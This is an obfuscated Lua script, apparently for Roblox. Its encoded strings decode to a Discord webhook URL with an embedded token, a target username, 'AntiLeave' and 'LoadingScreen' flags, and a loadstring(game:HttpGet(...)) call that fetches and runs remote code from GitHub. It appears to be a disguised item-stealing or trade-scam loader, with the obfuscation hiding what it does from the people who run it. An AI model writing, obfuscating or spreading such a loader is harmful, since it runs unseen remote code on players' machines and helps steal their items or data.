--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(((6 -1) -(1068 -(68 + 997)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1271 -(226 + 1044)))) -(v32-(620 -((2192 -(1523 + 114)) + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=927 -(193 + 21 + 713) ;local v85;while true do if (v84==(0 + 0)) then v85=2^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * ((1158 -686) -216)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,3 -2 ,972 -(802 + 150) ) * ((5 -3)^(102 -(124 -54)))) + v42 ;local v46=v20(v43,37 -16 ,14 + 17 );local v47=((v20(v43,(1104 -(1020 + 60)) + 8 )==(998 -(915 + 82))) and  -(439 -(145 + 293))) or (2 -1) ;if (v46==(1486 -(998 + 488))) then if (v45==(0 + 0)) then return v47 * (0 + 0) ;else local v90=0 -0 ;while true do if (v90==((2610 -(630 + 793)) -(1069 + (399 -281)))) then v46=2 -1 ;v44=0 + 0 ;break;end end end elseif (v46==(7472 -5425)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -(3759 -2965)) ) * (v44 + (v45/((1 + 1 + 0)^(843 -(368 + 423))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v66=1748 -(760 + 987) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(3 -1)) then v56=nil;v57=nil;v51=1825 -(301 + 1521) ;end if (v51~=(170 -(122 + 44))) then else while true do if (v52==(0 -0)) then v53=0 -0 ;v54=nil;v52=1;end if (v52==(4 -1)) then v59=nil;while true do local v97=0;while true do if (v97==(1 + 0)) then if (v53==2) then for v133=1 + 0 ,v23() do local v134=0 + 0 ;local v135;local v136;while true do if (v134==0) then v135=0 -0 ;v136=nil;v134=1;end if (v134~=(2 -1)) then else while true do if (v135==(1700 -(1419 + 281))) then v136=v21();if (v20(v136,1 -0 ,75 -(71 + 3) )==0) then local v181=0 + 0 ;local v182;local v183;local v184;local v185;while true do if (v181==(2 -1)) then v184=nil;v185=nil;v181=2;end if (v181~=(0 -0)) then else v182=0;v183=nil;v181=1 -0 ;end if (v181==2) then while true do if (v182==2) then local v189=0 + 0 ;local v190;while true do if ((241 -(187 + 54))~=v189) then else v190=780 -(162 + 618) ;while true do if (0~=v190) then else local v197=0;while true do if (1~=v197) then else v190=1 + 0 ;break;end if (v197~=0) then else if (v20(v184,3 -2 ,1)~=1) then else v185[2 + 0 ]=v59[v185[2]];end if (v20(v184,3 -1 ,852 -(20 + 830) )~=(1 -0)) then else v185[1 + 2 ]=v59[v185[3]];end v197=1;end end end if (v190==1) then v182=129 -(116 + 10) ;break;end end break;end end end if (v182==0) then v183=v20(v136,2,3);v184=v20(v136,1640 -(1373 + 263) ,1006 -(451 + 549) );v182=1;end if (v182~=(1 + 2)) then else if (v20(v184,741 -(542 + 196) ,4 -1 )~=1) then else v185[6 -2 ]=v59[v185[1388 -(746 + 638) ]];end v54[v133]=v185;break;end if (1~=v182) then else local v192=0 + 0 ;local v193;while true do if (v192==(0 -0)) then v193=0 + 0 ;while true do if (v193~=(0 + 0)) then else local v198=0;while true do if (v198==(0 -0)) then v185={v22(),v22(),nil,nil};if (v183==(1121 -(118 + 1003))) then local v203=341 -(218 + 123) ;local v204;local v205;local v206;while true do if (v203~=(378 -(142 + 235))) then else v206=nil;while true do if ((1581 -(1535 + 46))~=v204) then else local v209=0;while true do if (v209==1) then v204=1;break;end if (v209==(0 + 0)) then v205=0 + 0 ;v206=nil;v209=1;end end end if (v204==(1 + 0)) then while true do if (v205~=(560 -(306 + 254))) then else v206=0 + 0 ;while true do if (v206~=(0 -0)) then else v185[3]=v22();v185[4]=v22();break;end end break;end end break;end end break;end if (v203==(1467 -(899 + 568))) then v204=0 + 0 ;v205=nil;v203=2 -1 ;end end elseif (v183==(604 -(268 + 335))) then v185[293 -(60 + 230) ]=v23();elseif (v183==2) then v185[2 + 1 ]=v23() -((574 -(426 + 146))^(2 + 14)) ;elseif (v183~=(1459 -(282 + 1174))) then else local v210=811 -(569 + 242) ;local v211;local v212;while true do if (v210==1) then while true do if (v211==(0 -0)) then v212=0 -0 ;while true do if (v212==(0 + 0)) then v185[3]=v23() -(2^(1040 -(706 + 318))) ;v185[1255 -(721 + 530) ]=v22();break;end end break;end end break;end if ((1271 -(945 + 326))~=v210) then else v211=0 -0 ;v212=nil;v210=2 -1 ;end end end v198=1;end if ((1 + 0)~=v198) then else v193=701 -(271 + 429) ;break;end end end if ((1330 -(797 + 532))~=v193) then else v182=2 + 0 ;break;end end break;end end end end break;end end end break;end end break;end end end for v137=1 + 0 ,v23() do v55[v137-(1 + 0) ]=v28();end return v57;end break;end if (v97~=0) then else if (v53~=(1500 -(1408 + 92))) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=1289 -(993 + 295) ;end if (v53~=(1 + 0)) then else local v130=731 -(476 + 255) ;while true do if (v130==(1173 -(418 + 753))) then v53=1 + 1 ;break;end if (v130~=0) then else v58=v23();v59={};v130=1 + 0 ;end if (v130==(1 -0)) then local v175=0;while true do if ((1 -0)~=v175) then else v130=240 -(64 + 174) ;break;end if ((0 + 0)~=v175) then else for v177=1,v58 do local v178=0 -0 ;local v179;local v180;while true do if (0==v178) then local v186=0 + 0 ;local v187;while true do if (v186~=(0 + 0)) then else v187=0;while true do if (v187==(0 + 0)) then local v194=529 -(406 + 123) ;while true do if (v194~=(1769 -(1749 + 20))) then else v179=v21();v180=nil;v194=1 + 0 ;end if ((1323 -(1249 + 73))==v194) then v187=1 + 0 ;break;end end end if (1==v187) then v178=1 + 0 ;break;end end break;end end end if (v178==(1505 -(363 + 1141))) then if (v179==(1146 -(466 + 679))) then v180=v21()~=0 ;elseif (v179==(4 -2)) then v180=v24();elseif (v179~=(8 -5)) then else v180=v25();end v59[v177]=v180;break;end end end v57[8 -5 ]=v21();v175=1901 -(106 + 1794) ;end end end end end v97=1 + 0 ;end end end break;end if (v52~=1) then else local v95=0;while true do if ((1975 -(1913 + 62))==v95) then v55=nil;v56=nil;v95=1 + 0 ;end if (v95==1) then v52=1 + 1 ;break;end end end if (v52==(5 -3)) then local v96=0 -0 ;while true do if (v96~=(115 -(4 + 110))) then else v52=1664 -(1477 + 184) ;break;end if (v96==0) then v57=nil;v58=nil;v96=1;end end end end break;end if (v51~=(587 -(57 + 527))) then else v58=nil;v59=nil;v51=4 + 0 ;end if (v51==(1428 -(41 + 1386))) then v54=nil;v55=nil;v51=2;end if ((0 -0)~=v51) then else v52=0 -0 ;v53=nil;v51=104 -(17 + 86) ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];elseif (v81>1) then local v114=0;local v115;while true do if (v114==0) then v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));break;end end else local v116=0;local v117;local v118;while true do if (v116==1) then v78[v117 + 1 ]=v118;v78[v117]=v118[v80[4]];break;end if (v116==0) then v117=v80[2];v118=v78[v80[3]];v116=1;end end end elseif (v81<=3) then local v104=v80[2];local v105,v106=v71(v78[v104](v13(v78,v104 + 1 ,v80[3])));v73=(v106 + v104) -1 ;local v107=0;for v112=v104,v73 do local v113=0;while true do if (v113==0) then v107=v107 + 1 ;v78[v112]=v105[v107];break;end end end elseif (v81>4) then v78[v80[2]]=v80[3];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=8) then if (v81<=6) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>7) then v62[v80[3]]=v78[v80[2]];else v78[v80[2]]();end elseif (v81<=9) then v78[v80[2]]=v62[v80[3]];elseif (v81==10) then local v124=0;local v125;local v126;local v127;local v128;local v129;while true do if (v124==7) then v125=0;for v172=v129,v73 do v125=v125 + 1 ;v78[v172]=v126[v125];end v72=v72 + 1 ;v80=v68[v72];v124=8;end if (3==v124) then v80=v68[v72];v129=v80[2];v128=v78[v80[3]];v78[v129 + 1 ]=v128;v124=4;end if (9==v124) then v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end break;end if (v124==5) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v124=6;end if (v124==1) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v124=2;end if (v124==6) then v80=v68[v72];v129=v80[2];v126,v127=v71(v78[v129](v13(v78,v129 + 1 ,v80[3])));v73=(v127 + v129) -1 ;v124=7;end if (v124==8) then v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v124=9;end if (v124==0) then v125=nil;v126,v127=nil;v128=nil;v129=nil;v124=1;end if (v124==4) then v78[v129]=v128[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v124=5;end if (v124==2) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v124=3;end end else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503103O004D533254726164696E674C6567656E6403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132353932373938352O34373435323739332F4D4B536A502O5A4F6F5775786F446354772O3231616B6752304636353654454F6B676331666E634F61656A425337556C496635424E5F51414A49646A704C6D2D7048544403093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00124O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012093O00063O00300A3O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
